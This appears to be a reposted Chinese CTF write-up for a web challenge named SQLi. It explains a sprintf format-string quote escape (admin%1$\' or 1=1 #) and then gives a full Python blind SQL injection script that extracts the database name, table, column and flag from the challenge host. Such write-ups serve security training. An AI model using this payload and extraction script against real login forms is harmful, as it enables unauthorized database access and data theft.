CTF-“迎聖誕,拿大獎”活動賽題SQLi
阿新 • • 發佈:2021-01-11
分值:200分 型別:Web題目名稱:SQLi
題目內容:find the flag.
解題步驟
- 進入連結,發現是個登入頁面,沒有註冊的地方,填入admin&admin,提示password error!
- 分析報文,無異常
- intruder一遍,發現username是
admin%時報錯
image.png
- 顯然是sprintf的格式化問題導致單引號逃逸
- 嘗試各種字串後,postdata為
username=admin%1$\\' or 1=1 # &password=admin顯示password error!.username=admin%1$\\' or 1=2 # &password=admin顯示username error!,顯然注入點就是這裡了. - 用指令碼跑出flag
程式碼:
#coding:utf-8 import requests import string def boom(): url = r'http://af6add5b19fe4fddad8a5d5e413129df464f7ee5ce6d4a89.game.ichunqiu.com/index.php' s = requests.session() dic = string.digits + string.letters + "[email protected]#$%^&*()_+{}-=" right = 'password error!' error = 'username error!' lens = 0 i = 0 while True: payload = "admin%1$\\' or " + "length(database())>" + str(i) + "#" data={'username':payload,'password':1} r = s.post(url,data=data).content if error in r: lens=i break i+=1 pass print("[+]length(database()): %d" %(lens)) strs='' for i in range(lens+1): for c in dic: payload = "admin%1$\\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#" data = {'username':payload,'password':1} r = s.post(url,data=data).content if right in r: strs = strs + c print strs break pass pass print("[+]database():%s" %(strs)) lens=0 i = 1 while True: payload = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#" data = {'username':payload,'password':1} r = s.post(url,data=data).content if error in r: lens = i break i+=1 pass print("[+]length(table): %d" %(lens)) strs='' for i in range(lens+1): for c in dic: payload = "admin%1$\\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) +",1))=" + str(ord(c)) + "#" data = {'username':payload,'password':1} r = s.post(url,data=data).content if right in r: strs = strs + c print strs break pass pass print("[+]table_name:%s" %(strs)) tablename = '0x' + strs.encode('hex') table_name = strs lens=0 i = 0 while True: payload = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name = " + str(tablename) + " limit 0,1)>" + str(i) + "#" data = {'username':payload,'password':1} r = s.post(url,data=data).content if error in r: lens = i break i+=1 pass print("[+]length(column): %d" %(lens)) strs='' for i in range(lens+1): for c in dic: payload = "admin%1$\\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#" data = {'username':payload,'password':1} r = s.post(url,data=data).content if right in r: strs = strs + c print strs break pass pass print("[+]column_name:%s" %(strs)) column_name = strs num=0 i = 0 while True: payload = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#" data = {'username':payload,'password':1} r = s.post(url,data=data).content if error in r: num = i break i+=1 pass print("[+]number(column): %d" %(num)) lens=0 i = 0 while True: payload = "admin%1$\\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#" data = {'username':payload,'password':1} r = s.post(url,data=data).content if error in r: lens = i break i+=1 pass print("[+]length(value): %d" %(lens)) i=1 strs='' for i in range(lens+1): for c in dic: payload = "admin%1$\\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#" data = {'username':payload,'password':'1'} r = s.post(url,data=data).content if right in r: strs = strs + c print strs break pass pass print("[+]flag:%s" %(strs)) if __name__ == '__main__': boom() print 'Finish!'